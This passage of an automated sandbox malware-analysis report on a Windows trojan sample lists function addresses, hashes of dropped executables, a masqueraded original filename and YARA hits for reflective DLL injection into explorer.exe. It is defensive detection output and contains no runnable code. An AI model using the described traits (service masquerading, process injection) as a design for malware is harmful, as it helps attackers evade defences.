Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C5344 9_2_00007FF7A34C5344
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C3414 9_2_00007FF7A34C3414
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34CFA88 9_2_00007FF7A34CFA88
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C7A84 9_2_00007FF7A34C7A84
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34CF234 9_2_00007FF7A34CF234
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34CB310 9_2_00007FF7A34CB310
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C5994 9_2_00007FF7A34C5994
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C317C 9_2_00007FF7A34C317C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34CB934 9_2_00007FF7A34CB934
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34BF998 9_2_00007FF7A34BF998
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34CD8E4 9_2_00007FF7A34CD8E4
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B610C 9_2_00007FF7A34B610C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34D0898 9_2_00007FF7A34D0898
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C7014 9_2_00007FF7A34C7014
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C7E34 9_2_00007FF7A34C7E34
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34C3DF8 9_2_00007FF7A34C3DF8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B159C 9_2_00007FF7A34B159C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB5C74 10_2_00007FF779EB5C74
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EAFBD8 10_2_00007FF779EAFBD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E91000 10_2_00007FF779E91000
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA7AAC 10_2_00007FF779EA7AAC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA1280 10_2_00007FF779EA1280
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA0A60 10_2_00007FF779EA0A60
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB8A38 10_2_00007FF779EB8A38
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EAD200 10_2_00007FF779EAD200
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA91B0 10_2_00007FF779EA91B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB518C 10_2_00007FF779EB518C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA2CC4 10_2_00007FF779EA2CC4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA1484 10_2_00007FF779EA1484
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA0C64 10_2_00007FF779EA0C64
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA73F4 10_2_00007FF779EA73F4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB33BC 10_2_00007FF779EB33BC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB0B84 10_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E98B20 10_2_00007FF779E98B20
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB4F10 10_2_00007FF779EB4F10
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA0E70 10_2_00007FF779EA0E70
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E995FB 10_2_00007FF779E995FB
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EACD6C 10_2_00007FF779EACD6C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA28C0 10_2_00007FF779EA28C0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EAD880 10_2_00007FF779EAD880
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA1074 10_2_00007FF779EA1074
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA5040 10_2_00007FF779EA5040
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E99FCD 10_2_00007FF779E99FCD
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E9979B 10_2_00007FF779E9979B
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EA1F30 10_2_00007FF779EA1F30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EAFBD8 10_2_00007FF779EAFBD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB5728 10_2_00007FF779EB5728
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779EB2F20 10_2_00007FF779EB2F20
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB5C74 12_2_00007FF779EB5C74
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB4F10 12_2_00007FF779EB4F10
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E91000 12_2_00007FF779E91000
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA7AAC 12_2_00007FF779EA7AAC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA1280 12_2_00007FF779EA1280
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA0A60 12_2_00007FF779EA0A60
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB8A38 12_2_00007FF779EB8A38
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EAD200 12_2_00007FF779EAD200
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA91B0 12_2_00007FF779EA91B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB518C 12_2_00007FF779EB518C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA2CC4 12_2_00007FF779EA2CC4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA1484 12_2_00007FF779EA1484
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA0C64 12_2_00007FF779EA0C64
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA73F4 12_2_00007FF779EA73F4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EAFBD8 12_2_00007FF779EAFBD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB33BC 12_2_00007FF779EB33BC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB0B84 12_2_00007FF779EB0B84
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E98B20 12_2_00007FF779E98B20
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA0E70 12_2_00007FF779EA0E70
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E995FB 12_2_00007FF779E995FB
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EACD6C 12_2_00007FF779EACD6C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA28C0 12_2_00007FF779EA28C0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EAD880 12_2_00007FF779EAD880
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA1074 12_2_00007FF779EA1074
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA5040 12_2_00007FF779EA5040
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E99FCD 12_2_00007FF779E99FCD
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779E9979B 12_2_00007FF779E9979B
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EA1F30 12_2_00007FF779EA1F30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EAFBD8 12_2_00007FF779EAFBD8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB5728 12_2_00007FF779EB5728
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF779EB2F20 12_2_00007FF779EB2F20
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831195E 12_2_00007FF8B831195E
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83A495C 12_2_00007FF8B83A495C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8303984 12_2_00007FF8B8303984
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EA3C 12_2_00007FF8B836EA3C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8305A20 12_2_00007FF8B8305A20
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831CAE4 12_2_00007FF8B831CAE4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832AB55 12_2_00007FF8B832AB55
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8301AF8 12_2_00007FF8B8301AF8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8302B90 12_2_00007FF8B8302B90
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830BBB0 12_2_00007FF8B830BBB0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831DC60 12_2_00007FF8B831DC60
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830DC30 12_2_00007FF8B830DC30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83A5CC0 12_2_00007FF8B83A5CC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B833ACC4 12_2_00007FF8B833ACC4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8328D50 12_2_00007FF8B8328D50
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8308D30 12_2_00007FF8B8308D30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836DDF0 12_2_00007FF8B836DDF0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836EE44 12_2_00007FF8B836EE44
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832BE10 12_2_00007FF8B832BE10
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8316E30 12_2_00007FF8B8316E30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831CEC0 12_2_00007FF8B831CEC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342EC0 12_2_00007FF8B8342EC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836CEC0 12_2_00007FF8B836CEC0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8308EA0 12_2_00007FF8B8308EA0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8303000 12_2_00007FF8B8303000
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830A030 12_2_00007FF8B830A030
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830B0B0 12_2_00007FF8B830B0B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8309120 12_2_00007FF8B8309120
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830423C 12_2_00007FF8B830423C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83022A4 12_2_00007FF8B83022A4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83122F0 12_2_00007FF8B83122F0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B838B2AC 12_2_00007FF8B838B2AC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B830A400 12_2_00007FF8B830A400
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831D408 12_2_00007FF8B831D408
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831641C 12_2_00007FF8B831641C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832654C 12_2_00007FF8B832654C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832C570 12_2_00007FF8B832C570
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8320580 12_2_00007FF8B8320580
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8308650 12_2_00007FF8B8308650
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83026A0 12_2_00007FF8B83026A0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832D6E0 12_2_00007FF8B832D6E0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8342694 12_2_00007FF8B8342694
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B831C6B0 12_2_00007FF8B831C6B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83646F8 12_2_00007FF8B83646F8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83157B8 12_2_00007FF8B83157B8
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83087D0 12_2_00007FF8B83087D0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8314788 12_2_00007FF8B8314788
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B836E864 12_2_00007FF8B836E864
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB63CF0 12_2_00007FF8BFB63CF0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB637B0 12_2_00007FF8BFB637B0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB61A80 12_2_00007FF8BFB61A80
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB6521C 12_2_00007FF8BFB6521C
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB62630 12_2_00007FF8BFB62630
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB61A80 12_2_00007FF8BFB61A80
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB63140 12_2_00007FF8BFB63140
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB62D30 12_2_00007FF8BFB62D30
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB76AE4 12_2_00007FF8BFB76AE4
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB72DD0 12_2_00007FF8BFB72DD0
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB971CC 12_2_00007FF8BFB971CC
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB9D130 12_2_00007FF8BFB9D130
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F554FD8 13_2_00007FF67F554FD8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F570898 13_2_00007FF67F570898
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56B934 13_2_00007FF67F56B934
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F55610C 13_2_00007FF67F55610C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56D8E4 13_2_00007FF67F56D8E4
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F567014 13_2_00007FF67F567014
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F55159C 13_2_00007FF67F55159C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F567E34 13_2_00007FF67F567E34
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F563DF8 13_2_00007FF67F563DF8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F557370 13_2_00007FF67F557370
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F565344 13_2_00007FF67F565344
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F563414 13_2_00007FF67F563414
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F567A84 13_2_00007FF67F567A84
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56FA88 13_2_00007FF67F56FA88
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56B310 13_2_00007FF67F56B310
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F55F998 13_2_00007FF67F55F998
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56317C 13_2_00007FF67F56317C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F565994 13_2_00007FF67F565994
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F56F234 13_2_00007FF67F56F234
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe 9053B6BBAF941A840A7AF09753889873E51F9B15507990979537B6C982D618CB
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe 688A1926A536813715B6ADB733CB66EA478F66C1C7985F5B607C613D6F671D5A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: String function: 00007FF6CF9420F4 appears 54 times
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: String function: 00007FF6BCCA20F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF78FA620F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF67F5520F4 appears 54 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF7A34B20F4 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF779E92760 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF8B8306448 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: String function: 00007FF779E925F0 appears 100 times
PE file does not import any functions
Source: api-ms-win-crt-time-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.10.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000000.2058383220.00007FF6CF987000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000003.2067688265.0000025F1C6D1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe, 00000000.00000002.2070000024.0000025F1A96C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameServ vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Binary or memory string: OriginalFilenameServices.exe: vs SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe
Yara signature match
Source: 3.2.explorer.exe.8b70000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.8b70000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.9ee0000.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.9ee0000.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.0.explorer.exe.3350000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.11050000.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.explorer.exe.11050000.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.0.explorer.exe.3350000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
